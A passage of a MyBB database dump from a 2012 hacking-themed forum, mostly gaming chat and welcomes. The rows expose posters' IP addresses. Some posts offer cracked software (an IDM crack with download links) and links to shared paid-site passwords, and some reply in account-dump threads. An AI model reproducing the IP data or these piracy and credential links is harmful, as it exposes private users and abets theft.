'729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '4', 'Triple H', '1350098887', 'One of my PC already got infected through this.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f4da55eaaa5d5792f59f6c0716f1031c', '0', '0'); INSERT INTO mybb_posts VALUES('4369', '824', '4310', '4', 'RE: Glowing Here!', '0', '4', 'Triple H', '1350098943', 'Welcome to L33THacking, your username reminds me of someone from LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'eddcec31ff401ed3a8db675484e6612b', '0', '0'); INSERT INTO mybb_posts VALUES('4370', '832', '0', '25', '[News] Windows 8 security flaw', '0', '4', 'Triple H', '1350099105', 'Windows 8 is the first operating system from Microsoft to support alternative non-biometric authentication mechanisms such as Picture Password and PIN. A vulnerability discovered by a password security vendor - \"Passcape\" in Microsoft’s Windows 8 operating system that it saves a log on password in plain text and allows any user with admin rights to see the password details.\r\n\r\nIn September, though, some drawbacks of the new authentication method were reported by Passcape Software. The picture password had seemed invulnerable, because whoever tries to guess it must know how and what parts of the image to choose, and in addition, the gesture sequence. However, security experts from Passcape discovered that such a unique password is based on a regular account.\r\n\r\nA user should first create a regular password-based account and then optionally switch to the picture password or PIN authentication. Notably, the original plain-text password to the account is still stored in the system encrypted with the AES algorithm, in a Vault storage at\r\n\r\n[i]%SYSTEM_DIR%/config/systemprofile/AppData/Local/Microsoft/Vault/4BF4C442-9B8A-41A0-B380-DD4A704DDB28. - See more at: http://thehackernews.com/2012/10/windows-8-security-flaw-logon-passwords.html#sthash.0mxjthJZ.dpuf[/i]\r\n\r\n[img]http://1.bp.blogspot.com/-ir906HesG_I/UHhgSTnW-AI/AAAAAAAAJi8/Vqs573MwLBs/s640/Windows+8+Security+flaw.png[/img]\r\n\r\nSource: http://thehackernews.com/2012/10/windows-8-security-flaw-logon-passwords.html#sthash.0mxjthJZ.dpbs', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6150c2753d1338e5581d748c89c6629e', '0', '0'); INSERT INTO mybb_posts VALUES('4371', '790', '4350', '58', 'RE: Unique - Recruitment', '0', '4', 'Triple H', '1350099252', '[quote=\'iTzIpod\' pid=\'4350\' dateline=\'1350092788\']\r\nI\'ll apply. Do I still gotta fill out the form? Even though I was the Original Leader of Unique?\r\n[/quote]\r\n\r\nAren\'t your 1K posts enough to prove how unique you are?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4670ed174c924bd0fbc1c198c4c7c43b', '0', '0'); INSERT INTO mybb_posts VALUES('4372', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '232', 'BreShiE', '1350099691', 'Damn, guess I\'ll have to come back once I get 50 posts.', '78.149.81.254', '1318408702', '1', '0', '0', '0', '1', '0f8fc3280b799b59e2bd3e00662131aa', '0', '0'); INSERT INTO mybb_posts VALUES('4373', '824', '4310', '4', 'RE: Glowing Here!', '0', '232', 'BreShiE', '1350099723', 'Welcome to the forums Glowing, hope you enjoy your stay.\n\n~BreShiE', '78.149.81.254', '1318408702', '1', '0', '0', '0', '1', '645606b8547edd843087d4075231f084', '0', '0'); INSERT INTO mybb_posts VALUES('4374', '832', '4370', '25', 'RE: [News] Windows 8 security flaw', '0', '232', 'BreShiE', '1350099783', 'I hope they fix this before it is released. I\'m thinking about purchasing it. I\'ll get a discount because I\'m a student. :D', '78.149.81.254', '1318408702', '1', '0', '0', '0', '1', '93b95380dd730aedb48cc2dc91afe7d8', '0', '0'); INSERT INTO mybb_posts VALUES('4375', '833', '0', '3', 'New feature coming up!', '0', '1', 't3h jok3r', '1350099871', 'After a lot of requests I\'m finally adding this to LH even though I have been suggested not to. If the sites activity drops due to this feature then it would be removed permanently. Thanks to BreShie for sending me this.\r\n\r\n[spoiler]\r\nI\'m adding a chat feature on L33THacking :D\r\n\r\nYou can video chat, send files, share screen, audio chat, send emoticons, save conversation and much more. \r\n[/spoiler]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4958c6211cda727ea27403b50629f98d', '0', '0'); INSERT INTO mybb_posts VALUES('4376', '833', '4375', '3', 'RE: New feature coming up!', '0', '232', 'BreShiE', '1350100145', 'No worries man, I\'m here to help. :)\n\nI want to help this forum grow into the great forum that I know it can, and will be!', '78.149.81.254', '1318408702', '1', '0', '0', '0', '1', 'd8dcc19265a0628173d4d68e30be3f00', '0', '0'); INSERT INTO mybb_posts VALUES('4377', '834', '0', '64', 'The Marine DVDrip', '0', '5', 'Timmy', '1350100210', '[img]http://upload.wikimedia.org/wikipedia/en/thumb/8/8f/The_marine.jpg/220px-The_marine.jpg[/img]\n\nGenre: Action , Drama , Thriller\nRelease: 2006 October\nLength: 1H., 33 min. \nViews: 0 (7 votes)\nRate: 91%\n\n[b]Description[/b]\n\nA group of diamond thieves on the run kidnap the wife of a recently discharged marine who goes on a chase through the South Carolinian wilderness to retrieve her..\n\n[b]Links [/b]\n\n[url=http://www.embedder.eu/frame.php?url=http://www.putlocker.com/file/1H4XWG18NFI8WW4O]Putlocker[/url]\n\n[url=http://www.embedder.eu/frame.php?url=http://www.sockshare.com/file/G0UUVCJTLRSWKO4]Sockshare[/url]', '72.231.24.165', '1223104677', '1', '0', '5', '1350100271', '1', '3af981a6ab1c14f434791021a793146e', '0', '1350100271'); INSERT INTO mybb_posts VALUES('4378', '833', '4375', '3', 'RE: New feature coming up!', '0', '3', '??????????¢™', '1350100270', 'Nice, I cant wait to see it.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'aa54d1a5ec9e96a10a91c11a12fe6944', '0', '0'); INSERT INTO mybb_posts VALUES('4379', '834', '4377', '64', 'RE: The Marine DVDrip', '0', '205', 'mothered', '1350101015', 'I like movies of this nature.\r\n\r\nDoes this get right Into the storyline/action, or does It drag on?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '0d40844400db516b206cc0805fd48d55', '0', '0'); INSERT INTO mybb_posts VALUES('4380', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '100', '??zg???g????61', '1350101092', 'Can I join? :) thanks this is awesome', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '8b2cc078f1e66e13ed7785d78e653e71', '0', '0'); INSERT INTO mybb_posts VALUES('4381', '835', '0', '24', 'Just purchased another Lappy', '0', '205', 'mothered', '1350101212', 'Greetings to all,\r\n\r\nSo one of my test lappies, Is really giving me hassles, whereby the spacebar, and half the keys aren\'t functional. The optical drive Isn\'t working and the screen tends to flicker every now and then.\r\n\r\nI decided enough Is enough, and just purchased a new lappy for testing purposes. All up, I now have 7 fully-functional lappies.\r\n\r\nHere\'s what I bought: http://www.mln.com.au/product/?itemID=3955\r\n\r\nI haven\'t checked, but I believe the RRP Is a load of crap. I know what I reckon, so good or bad, what do you guys think?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '56be6033a18cce56dae9b764b90ce4e0', '0', '0'); INSERT INTO mybb_posts VALUES('4382', '833', '4375', '3', 'RE: New feature coming up!', '0', '205', 'mothered', '1350101324', 'It works for some, and not for others.\r\n\r\nI personally believe It\'ll be a good addition.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '978a460ace7046e6fdd6629441012a24', '0', '0'); INSERT INTO mybb_posts VALUES('4383', '764', '3895', '15', 'RE: Hack Pack By Timmy | 2GB |', '0', '205', 'mothered', '1350101438', 'The link Is working fine on my end. Downloading right now.\r\n\r\nMany thanks mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '7078491abc59ad387d0e7c6d35ec7cb4', '0', '0'); INSERT INTO mybb_posts VALUES('4384', '523', '2615', '43', 'RE: Windows 8 Pro Keys', '0', '205', 'mothered', '1350101557', 'Unfortunately, Microsoft have cracked down on the offline activation method.\r\n\r\nThat said, I haven\'t tried all countries though.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '91c423e8af391c14d650cdf81584c226', '0', '0'); INSERT INTO mybb_posts VALUES('4385', '836', '0', '30', 'Internet Download Manager [IDM] v6.12.22 + crack + skin', '0', '255', 'sbhshroy2', '1350101731', '[color=darkred]Internet Download Manager [IDM] v6.12 . 22 +crack[/color]\r\n\r\n[color=green]Internet Download Manager [IDM] v6.12 Build 22 Final - Full with skin\r\n? Incl. crack by muftakis\r\nReleased: october 10, 2012 [/color]\r\n\r\n[img]http://upit.cc/i/84c88dd4.jpg[/img]\r\n\r\n[img]http://upit.cc/i/bd199cc1.png[/img]\r\n[quote]nternet Download Manager (IDM) has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. IDM increases download speeds by up to 5 times, resumes and schedules downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use. IDM has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download managers and accelerators, IDM segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.\r\n\r\nMain Features:\r\n? Internet Download Manager supports all popular browsers including IE, AOL, MSN, Opera, Firefox, Avant Browser, and it can be integrated into any Internet application to take over downloads using unique ?Advanced Browser Integration? feature.\r\n? Dynamic Segmentation and Performance.\r\n? Easy downloading with one click. When you click on a download link in a browser, IDM will take over the download and accelerate it. IDM supports HTTP, FTP, HTTPS and MMS protocols.\r\n? Download Speed Acceleration. IDM can accelerate downloads by up to 5 times due to its intelligent dynamic file segmentation technology.\r\n? Download Resume. IDM will resume unfinished download from the place where they left off.\r\n? YouTube grabber. IDM can grab FLV videos from popular sites like YouTube, MySpaceTV, and Google Video.\r\n? Drag and Drop. You may simply drag and drop links to IDM, and drag and drop downloaded files out of Internet Download Manager.\r\n? Automatic Antivirus checking. Antivirus checking makes your downloads free from viruses and trojans.\r\n? Advanced Browser Integration. When enabled, the feature can be used to catch any download from any application.\r\n? Built-in Scheduler. IDM can connect to the Internet at a set time, download the files you want, disconnect, or shut down your computer when it?s done.\r\n? IDM includes web site spider and grabber. IDM downloads all required files that are specified with filters from web sites, for example all pictures from a web site, or subsets of web sites, or complete web sites for offline browsing. It?s possible to schedule multiple grabber projects to run them once at a specified time, stop them at a specified time, or run periodically to synchronize changes.\r\n? IDM supports many types of proxy servers. For example, IDM works with Microsoft ISA, and FTP proxy servers.\r\n? IDM supports main authentication protocols: Basic, Negotiate, NTLM, and Keberos. Thus IDM can access many Internet and proxy servers using login name and password.\r\n? Download All feature. IDM can add all downloads linked to the current page. It?s easy to download multiple files with this feature.\r\n? Download Categories. IDM can be used to organize downloads automatically using defined download categories.\r\n? Download limits. Progressive downloading with quotas feature. The feature is useful for connections that use some kind of fair access policy (or FAP) like Direcway, Direct PC, Hughes, etc.\r\n? IDM is multilingual. \r\n\r\nhat\'s new in version 6.12 build 22?\r\n(Released: october 10, 2012)\r\n- Added support for Firefox 18\r\n- Fixed bugs \r\n\r\n~~~~~~~~~~~\r\n!Install Notes!\r\n~~~~~~~~~~~\r\n1]Install IDM\r\n2]Use crack\r\n3]Enjoy!!\r\n\r\n[/quote]\r\n\r\n[img]http://upit.cc/i/04a9a9f4.png[/img]\r\n[code]http://rapidgator.net/file/49888998/IDM.6.12.22.Incl.Crack-MUFTAKiS.rar.html\r\n\r\nhttp://ul.to/i56xq4v2\r\n\r\nhttp://bitshare.com/files/pb5fywxx/IDM.6.12.22.Incl.Crack-MUFTAKiS.rar.html\r\n[/code]\r\n\r\n[color=#FF0000]skin[/color]\r\n[img]http://upit.cc/i/10bb4987.png[/img]\r\n\r\n[img]http://upit.cc/i/4b7d2d18.png[/img]\r\n[CODE]http://ul.to/rirm75j9\r\n\r\nhttp://bitshare.com/files/wp8dqdl9/IDM_Toolbar_Skin.rar.html\r\n\r\nhttp://rapidgator.net/file/49889168/IDM_Toolbar_Skin.rar.html[/CODE]\r\n\r\n[img]http://upit.cc/i/b69df077.gif[/img]\r\n\r\n[img]http://upit.cc/i/a3d890fc.png[/img]', '106.209.130.121', '1792115321', '0', '0', '255', '1350101797', '1', '340dbfcab5f92a71da6d59aca81462ef', '0', '1350101797'); INSERT INTO mybb_posts VALUES('4386', '764', '4036', '15', 'RE: Hack Pack By Timmy | 2GB |', '0', '1', 't3h jok3r', '1350101902', '[quote=\'Anonymous™\' pid=\'4036\' dateline=\'1349787707\']\r\nError (509)\r\nThis account\'s public links are generating too much traffic and have been temporarily disabled!\r\n[/quote]\r\n\r\n\r\nLink works for me too. Are you sure?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6ed6219063f64086eed959d9f9b66204', '0', '0'); INSERT INTO mybb_posts VALUES('4387', '837', '0', '54', '[13 October ]Brazzers,Bangbros,Mofos,Reality Kings....and many more.100 % working', '0', '255', 'sbhshroy2', '1350102258', 'click here http://adf.ly/Ddrrq', '106.209.130.121', '1792115321', '0', '0', '0', '0', '1', 'cdec5697db597495f0d9178ce2b6cc29', '0', '0'); INSERT INTO mybb_posts VALUES('4388', '838', '0', '54', 'realitykings premium acount for 13/10/2012', '0', '255', 'sbhshroy2', '1350102320', 'click here http://adf.ly/DdK5d', '106.209.130.121', '1792115321', '0', '0', '0', '0', '1', 'd32d93126b45a21797546993394bf36f', '0', '0'); INSERT INTO mybb_posts VALUES('4389', '839', '0', '54', '[13.OKT]Brazzers,Bangbros,RK,...and more HUGE MIXXX OF WORKING PASSES FOR 13.OKT.2012', '0', '255', 'sbhshroy2', '1350102366', 'click here http://adf.ly/DdKR2', '106.209.130.121', '1792115321', '0', '0', '0', '0', '1', 'd06504af52342d57a5aa54c8f76111fc', '0', '0'); INSERT INTO mybb_posts VALUES('4390', '840', '0', '4', 'Its andrew', '0', '256', 'Andrew', '1350102912', 'new here i dont know squat about hacking or coding but id like to learn \r\n\r\nBreshie brought me here :)', '76.105.69.111', '1281967471', '0', '0', '0', '0', '1', '0dc9d9693addcfd0c71f8e3e100c8a3e', '0', '0'); INSERT INTO mybb_posts VALUES('4391', '840', '4390', '4', 'RE: Its andrew', '0', '3', '??????????¢™', '1350103006', 'Welcome to LH, We hope you enjoy your stay.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '5659f682fb1d4da8eae6824db91e1614', '0', '0'); INSERT INTO mybb_posts VALUES('4392', '841', '0', '71', 'whats the best game ever made.', '0', '257', 'XxTREYZxX', '1350112172', 'hello L33T HACKING this is my first post \r\ni wasjust wondering what is the best game ever made. thanks L33T', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'f4ae7e9060e43039651ba9d5deec19fa', '0', '0'); INSERT INTO mybb_posts VALUES('4393', '827', '4326', '76', 'RE: Playstation names', '0', '254', 'Greed', '1350112207', 'No problem bro lol, I even got a whole week off again from work! so like 24 hrs of gaming!! and being on here and btw I like the color of the forums.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '07ad408a7a560c608a6281ac1f9ba2bd', '0', '0'); INSERT INTO mybb_posts VALUES('4394', '692', '3518', '71', 'RE: COD Black OPs or COD MW3?', '0', '257', 'XxTREYZxX', '1350112717', 'i would prefer mw3 because its way harder and more competive and black ops is for all the noobs because not many people play it', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '1d79e9f235bb39af12e4f88b06efa1b6', '0', '0'); INSERT INTO mybb_posts VALUES('4395', '833', '4375', '3', 'RE: New feature coming up!', '0', '222', 'Exposé', '1350112796', 'Oh is this the cometchat thinge? Nice hope it is awesome :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '194e4c83272c3117047b60a90c1f2959', '0', '0'); INSERT INTO mybb_posts VALUES('4396', '828', '4327', '71', 'RE: Planetary Anhiliation', '0', '257', 'XxTREYZxX', '1350112824', 'yeah thats pretty awesome thank and nice thread', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'a15217092ce2067da80cf575bb12b4ff', '0', '0'); INSERT INTO mybb_posts VALUES('4397', '840', '4390', '4', 'RE: Its andrew', '0', '222', 'Exposé', '1350112830', 'Lol whats up Andrew. Welcome to L33thacking. Hope you enjoy your stay', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '06a9deb0ab1dcd18ea2eb73a878cc9cb', '0', '0'); INSERT INTO mybb_posts VALUES('4398', '828', '4327', '71', 'RE: Planetary Anhiliation', '0', '254', 'Greed', '1350112918', 'Thank you kind sir, Cant wait for it to come out. Hope it comes out in the next year or so.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '6eb43b31064eda7105995c885ebf6081', '0', '0'); INSERT INTO mybb_posts VALUES('4399', '827', '4326', '76', 'RE: Playstation names', '0', '257', 'XxTREYZxX', '1350112932', 'haha iv already got your psn name but havent had time to add you', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'c8022399fa2b9fd0f8b8c7a734651f37', '0', '0'); INSERT INTO mybb_posts VALUES('4400', '842', '0', '71', 'Assasins creed 3', '0', '254', 'Greed', '1350113037', 'So I\'ve bet you all heard by now Assassin creed 3, Well I pre ordered it on my ps3. Any other who is waiting for it to come out? What is the first thing your going to do?\r\n\r\n\r\nThe First thing im going to do on Assassin\'s creed 3 is tomahawk a guy. lol', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'f39d8cadbd9beacc08b9c9cb3d0a3c17', '0', '0'); INSERT INTO mybb_posts VALUES('4401', '802', '4184', '77', 'RE: MW3 Knockback Lobby | FREE', '0', '257', 'XxTREYZxX', '1350113047', 'damm i am currently on ps3, i sold my xbox last month', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '6aba4cab62c18cea2e95161606ddf843', '0', '0'); INSERT INTO mybb_posts VALUES('4402', '815', '4267', '73', 'RE: your favourite iOS games', '0', '257', 'XxTREYZxX', '1350113239', 'mine would probably have to be dead trigger i love to play arena', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '889b1652c2138398ca2181587c913ede', '0', '0'); INSERT INTO mybb_posts VALUES('4403', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350113251', 'yeah i\'ll try looking for you, you should get back into it, im going to verify my dragonfable account with it today hopefully. But yeah you all should start playing it, I\'ll make a guild for all of us if you can join and heck when I get paid I could buy some of you Member\'s, if you want.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'b0c79ebe5e14ebedc59faad1e7d2e0e7', '0', '0'); INSERT INTO mybb_posts VALUES('4404', '843', '0', '73', 'whats the best IOS game ever', '0', '257', 'XxTREYZxX', '1350113351', 'hey i was just wondering what do you think is the best game ever', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '213958932fcc908774982d06f79517c9', '0', '0'); INSERT INTO mybb_posts VALUES('4405', '827', '4326', '76', 'RE: Playstation names', '0', '254', 'Greed', '1350113410', 'lol just add me now, it doesn\'t take time. Just get on your ps3 then add me then log out, bam boom baaazing Done!', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '4bf26c2aacc9f0f91d6422b204b5a3b3', '0', '0'); INSERT INTO mybb_posts VALUES('4406', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '257', 'XxTREYZxX', '1350113499', 'yeah im havent played in like 3 years i was level 48 and i was a guardian,:)', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'a47b23dcf932b2a4c4dee82ee7c2b82e', '0', '0'); INSERT INTO mybb_posts VALUES('4407', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '257', 'XxTREYZxX', '1350113596', 'i defiantly play minecraft im like a all-ROUNDER gamer', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '4805eba21c8394c7579a0c1bee1237a7', '0', '0'); INSERT INTO mybb_posts VALUES('4408', '767', '3913', '74', 'RE: Do you cheat/hack games?', '0', '257', 'XxTREYZxX', '1350113703', 'yes i only hack on single player', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '9bac929cdb477b10fc162d18cfccdda6', '0', '0'); INSERT INTO mybb_posts VALUES('4409', '724', '3651', '74', 'RE: Cheese Cake Client', '0', '257', 'XxTREYZxX', '1350113789', 'could you please put a virus scan and i will try it out', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '557d670086627495df59f791fc8d2b98', '0', '0'); INSERT INTO mybb_posts VALUES('4410', '569', '2813', '74', 'RE: 21,000 Minecraft Account Dump', '0', '257', 'XxTREYZxX', '1350113882', 'thanks and great thread, keep up the good work', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '0eb025fd7aa518fbd50024c8b8cfe0fd', '0', '0'); INSERT INTO mybb_posts VALUES('4411', '481', '2342', '74', 'RE: Runescape Accounts', '0', '257', 'XxTREYZxX', '1350113941', 'sorry i havent played runescape and dont plan on playing but great thread', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'adaae704bb47b5ef11c2e838f4510d8b', '0', '0'); INSERT INTO mybb_posts VALUES('4412', '428', '1942', '74', 'RE: Dark Steam | Free Steam Games', '0', '257', 'XxTREYZxX', '1350114055', 'thank you very much this is a great thread and its very handy ,thank you sir', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '3dea4f778a5eec8accaba974465280af', '0', '0'); INSERT INTO mybb_posts VALUES('4413', '787', '4097', '75', 'RE: Saints Row The Third Cheats + More!', '0', '257', 'XxTREYZxX', '1350114181', 'this is a great HQ post and this is very helpful and handy. lol my favorite weapon is the penetrator \nkeep up the good work', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'c2638d68cc1edc5cb592df1101705c0a', '0', '0'); INSERT INTO mybb_posts VALUES('4414', '775', '3997', '75', 'RE: GTA San Andreas Cheats', '0', '257', 'XxTREYZxX', '1350114314', 'great post and a helpful thread', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', 'c38a57f5a86822ff790f26cc228cb2d9', '0', '0'); INSERT INTO mybb_posts VALUES('4415', '842', '4400', '71', 'RE: Assasins creed 3', '0', '257', 'XxTREYZxX', '1350114411', 'im probably going to jump of a high as building and commit suicide', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '02865f09eb462b68179e21de99392870', '0', '0'); INSERT INTO mybb_posts VALUES('4416', '828', '4327', '71', 'RE: Planetary Anhiliation', '0', '257', 'XxTREYZxX', '1350114487', 'yeah it might come out in like April or somthing', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '31efa06c6ccc532a76b28c3319d333a0', '0', '0'); INSERT INTO mybb_posts VALUES('4417', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '257', 'XxTREYZxX', '1350114601', 'great tutorial on how to create a logo \n+rep for the HQ post, love it keep at it', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', 'dab6153899cb52925311ce9b90469505', '0', '0'); INSERT INTO mybb_posts VALUES('4418', '844', '0', '73', 'TEMPLE RUN CHEAT (UNLIMITED RUN)', '8', '257', 'XxTREYZxX', '1350115462', 'TEMPLE RUN CHEAT (UNLIMITED RUN)\r\nSTEPS\r\n1.GET YOUR IPOD READY\r\n2.PLAY TEMPLE RUN (INSTALL IF YOU DON\'T HAVE IT\r\n3.GO TO OPTIONS AT THE MAIN MENU\r\n4.TURN THE TUTORIAL ON\r\n5.GO BACK THEN PLAY \r\n6.WHEN YOU GET TO THE PART WHERE IT TEACHES YOU TO TURN AS YOUR ABOUT TO TURN SWIPE ACROSS 3 TIMES INSTEAD OF ONCE AND YOU SHOULD TURN AROUND THEN YOU WILL KEEP ON RUNNING FOREVER \r\n7.KEEP IN TRYING IF IT DOES NOT WORK \r\n8.TRUST ME IT WORKS \r\n9.THANKS HOPED YOU ENJOYED\r\nl33T', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '3c76e6692467b7b7b7341f14a0ca7670', '0', '0'); INSERT INTO mybb_posts VALUES('4419', '845', '0', '72', 'whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350115753', 'hey guys whats better ps3 or xbox', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'd64a3b357ba4fe0ac26a63d75db60809', '0', '0'); INSERT INTO mybb_posts VALUES('4420', '846', '0', '74', 'another great pvp', '0', '257', 'XxTREYZxX', '1350116135', 'here\'s a great pvp for mincraft \nits actually based on a archer games you start with a bow and you can select your kit \nhope you enjoy\nip:ag1.playeoe.com\nyou can change the number from 1 to 9 for a different map,host and lobbby', '203.104.11.2', '-882373886', '1', '0', '257', '1350163588', '1', '63ecdfcb21ad8e060dfa55de1d477f9a', '0', '1350163588'); INSERT INTO mybb_posts VALUES('4421', '190', '4366', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1350116520', 'inurl:\"pastebin.com\" & intext:\"', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'be164587ed1628d9ea1922df45919720', '0', '0'); INSERT INTO mybb_posts VALUES('4422', '842', '4400', '71', 'RE: Assasins creed 3', '0', '254', 'Greed', '1350116572', 'lol i accidentally did that on assassin creed 1, tried to jump in the hay but missed the hay and died lol.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '2e9be16372106051edd7a2df751153e5', '0', '0'); INSERT INTO mybb_posts VALUES('4423', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '254', 'Greed', '1350116722', 'I prefer the ps3, been playing it since ps1 and controllers are smaller and easier to handle, to me.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '83fc2d43b5dd674d7741be9c0ae4db7f', '0', '0'); INSERT INTO mybb_posts VALUES('4424', '840', '4390', '4', 'RE: Its andrew', '0', '199', 'Anonymous™', '1350116808', 'Welcome to L33thacking.net!', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'e719e59002169577730a90460e5d8dee', '0', '0'); INSERT INTO mybb_posts VALUES('4425', '847', '0', '76', 'add me on ps3', '0', '257', 'XxTREYZxX', '1350116850', '[b]add me at:xEP1C_SC0P3Sx\r\nI PLAY COD MW3 , ASSASSINS CREED 1,2, RELEVATIONS,GTA 5,BLACK OPS,[/b]', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '8f6d3047ec67272dade9093263271184', '0', '0'); INSERT INTO mybb_posts VALUES('4426', '842', '4400', '71', 'RE: Assasins creed 3', '0', '257', 'XxTREYZxX', '1350118587', 'haha fail, have you finished all of them', '203.104.11.2', '-882373886', '1', '1', '0', '0', '1', '50f275488f2552c74055150ed42498a5', '0', '0'); INSERT INTO mybb_posts VALUES('4427', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350118689', 'yeah i believe that to, and its known to be way better graphics wise :)', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '0b95fce46ecb7d1b85783aee6f6bf006', '0', '0'); INSERT INTO mybb_posts VALUES('4428', '726', '3653', '13', 'RE: Dorks', '0', '258', 'PiXEL^OG', '1350118986', 'The vul link dose not work anymore , Thanks for the heads up though', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '54751642c79ac00edbe27e52f6eda354', '0', '0'); INSERT INTO mybb_posts VALUES('4429', '827', '4326', '76', 'RE: Playstation names', '18', '257', 'XxTREYZxX', '1350119044', 'yeah but i have to go all the way down stairs then reach my hand out press the button turn on the tv, sign in add you,turn it off again, turn the tv off then walk all the way back up the stairs and then im done :)', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'e28f8ee7e3e46c23528aaf6c321db196', '0', '0'); INSERT INTO mybb_posts VALUES('4430', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '258', 'PiXEL^OG', '1350119317', 'XBOX 360 ALL THE WAY!!!\n\nIts MUCH easier to pirate games on it , Nowadays games cost like over a 100 dollars and i don\'t want to waste that much money.', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'd4c50a89e1829aef9c77be81723733cd', '0', '0'); INSERT INTO mybb_posts VALUES('4431', '842', '4400', '71', 'RE: Assasins creed 3', '0', '258', 'PiXEL^OG', '1350119443', 'Im more than a 100% sure that everyone is gonna do the first mission first lmao\r\n\r\nBut yeah for me im probably gonna hunt some deer #yummy', '139.190.235.246', '-1950422026', '0', '0', '258', '1350119460', '1', 'ea93c76ef3bb2a7290ec0330f61259b5', '0', '1350119460'); INSERT INTO mybb_posts VALUES('4432', '842', '4400', '71', 'RE: Assasins creed 3', '0', '257', 'XxTREYZxX', '1350119532', 'hmmm dear lol and yer i will do the first mission first duh', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'bff0f296c423ae496ff3d0c2634ae5af', '0', '0'); INSERT INTO mybb_posts VALUES('4433', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '257', 'XxTREYZxX', '1350119804', 'wow thanks so much i didnt know that luckily', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '501fa9dcd32dde261bc9eb12134ea324', '0', '0'); INSERT INTO mybb_posts VALUES('4434', '226', '919', '11', 'RE: A Newbies Guide', '0', '257', 'XxTREYZxX', '1350119923', 'brilliant HQ post keep up the good work', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'c209a2c3223e217cbd84e19faa284a6d', '0', '0'); INSERT INTO mybb_posts VALUES('4435', '848', '0', '12', 'can someone teach me how to hack a wifi connection', '11', '257', 'XxTREYZxX', '1350120079', 'hey i was just wondering if someone can teach me how to hack a wifi connection \r\nthank you', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'fb30084cb357a28ea2432a2059c5e2ef', '0', '0'); INSERT INTO mybb_posts VALUES('4436', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350120159', 'i will stick to ps3 and money doesnt bother me \r\nbut thanks for sharing', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '84922d643d96f7e44f02bed71cea6ac5', '0', '0'); INSERT INTO mybb_posts VALUES('4437', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '254', 'Greed', 